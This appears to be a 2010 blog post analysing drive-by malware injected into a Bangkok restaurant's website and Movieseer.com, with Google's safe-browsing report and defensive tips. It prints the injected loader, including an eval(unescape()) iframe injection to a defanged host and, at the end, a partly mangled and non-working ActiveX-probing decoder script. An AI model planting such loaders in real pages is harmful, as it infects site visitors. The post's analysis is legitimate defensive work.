Last night I went to a tweetup at a bistro in Sukhumvit, Bangkok.
Before heading off there, I checked online for the location and was dismayed to find the website infected with malware. Dismayed, because prior to going to see the so-so movie Inception the night before, I’d visited the website Movieseer.com to check times – only to find it likewise infected with malware.
I tweeted out what I saw on Movieseer.com which was sending to the user an executable file for Windows (‘inst.exe’) after linking to a server in Bosnia. I’m pleased to report Movieseer.com was fixed the next day. Fixed to the extent that the symptom was gone but I’m not so optimistic as to think the cause is fixed and my best guess is that the cause was SQL injection which would have been aided in no small part by the fact that movieseer has a history of (MS)SQL issues which they echo to the sceeen (that’s an ‘in-production no-no’). Cheers for that say our Bosnian friends.
Google is cautioning that this bistro site contains malware and following the google link for details, reveals this was recorded on or before 1st July – more than two weeks ago! Flabbergasted?
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-07-01, and the last time suspicious content was found on this site was on 2010-07-01.
Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
The site is a PHP site and the exploit uses javascript in the HTML. It could again be SQL injection if the site uses a database; it could be an exploit based on an aged or insecure PHP or it could and perhaps most likely be just a weak password on an FTP server leading to the index file being concatenated onto with javascript. As an ISP in Australia, I see these all too regularly and what is noteworthy is both the guessability of the passwords and the potential to also exploit POP3 mail, webmail and user accounts (ie ISP management account). Somewhere in there may be gold in the form of credit card details or more passwords. Also, friends and acquaintances for the puposes of social engineering.
It’s no secret that exploits these days are after material gain nor that exploits are increasingly multi-vector aka pursuing more than one location of attack and/or an attack that open up the potential for another, more significant attack.
But back to this exploit:
There is some javascript appended to the end of the page. The content is in a sequence of escape codes fed into the javascript as:
eval(unescape(‘escaped codes’))
Unescaping the escaped codes reveals what the server is sending to the user’s browser:
iframe src=”http://dXnwXo.com/?282406″
This looks like cross-site scripting attack (XSS) on account of the 3rd party site embedded via an iframe that then goes on to attempt instantiation of an ActiveXObject and to set a cookie in the user browser.
NB URL above is mangled with crosses so I don’t get mistaken for something infected. The 3rd party site is hosted in Vietnam (222.255.28.156 – VietNam Data Communication Company). Nameservers for the domain are located in Vietnam and The Czech Republic. The domain registrant uses a .ru address but that’s not reliable the way the IP addresses are.
It’d be interesting to pursue this further however, time’s up for me. Comments welcome.
How to avoid being a victim of this attack?
- Don’t have ActiveX enabled or don’t use Windows
- Disallow 3rd party cookies
- Use Google, OpenDNS or an A/V application to check pages you’re loading prior to load.
Web pages are the primary vector of malware attack having replaced email some time ago.
And… surf safely. It’s tragic that otherwise good sites like these are appropriated as black-hat due to some pretty serious ignorance. That’s why you have to take extra steps to protect yourself. An infection spread as innocuously as this could ruin your life and increasingly so.
Or was this all just a dream (within a dream (within a dream)) ?
var mytest = “0″;
try { new ActiveXObject(‘dX’); }
catch (e) { mytest = “1″; }
if(mytest==”1″)
{
var X6XJ=
var NXzXu = ”;
var dXnXRX = X6XJ.slice ( 14, 19350 );
for ( gt = 14 ; gt < 19350 ; gt += 2 ){
Nhztu += ‘%’ + X6XJ.slice ( gt, gt + 2 );
}
var bX4X = document.cookie;
var start = bX4X.indexOf(“lXmbX=”);
if (start == -1){
var expire s = new Date();
expires.setTime(expires.getTime()+3*3600*1000);
document.cookie = “lXmbX=update;expires=”+expires.toGMTString();
document.write(unescape(NXzXu));}
}
![[pjPTECHjp]](http://s.wsj.net/public/resources/images/PJ-AR811_pjPTEC_DV_20090930151036.jpg)
Sprint
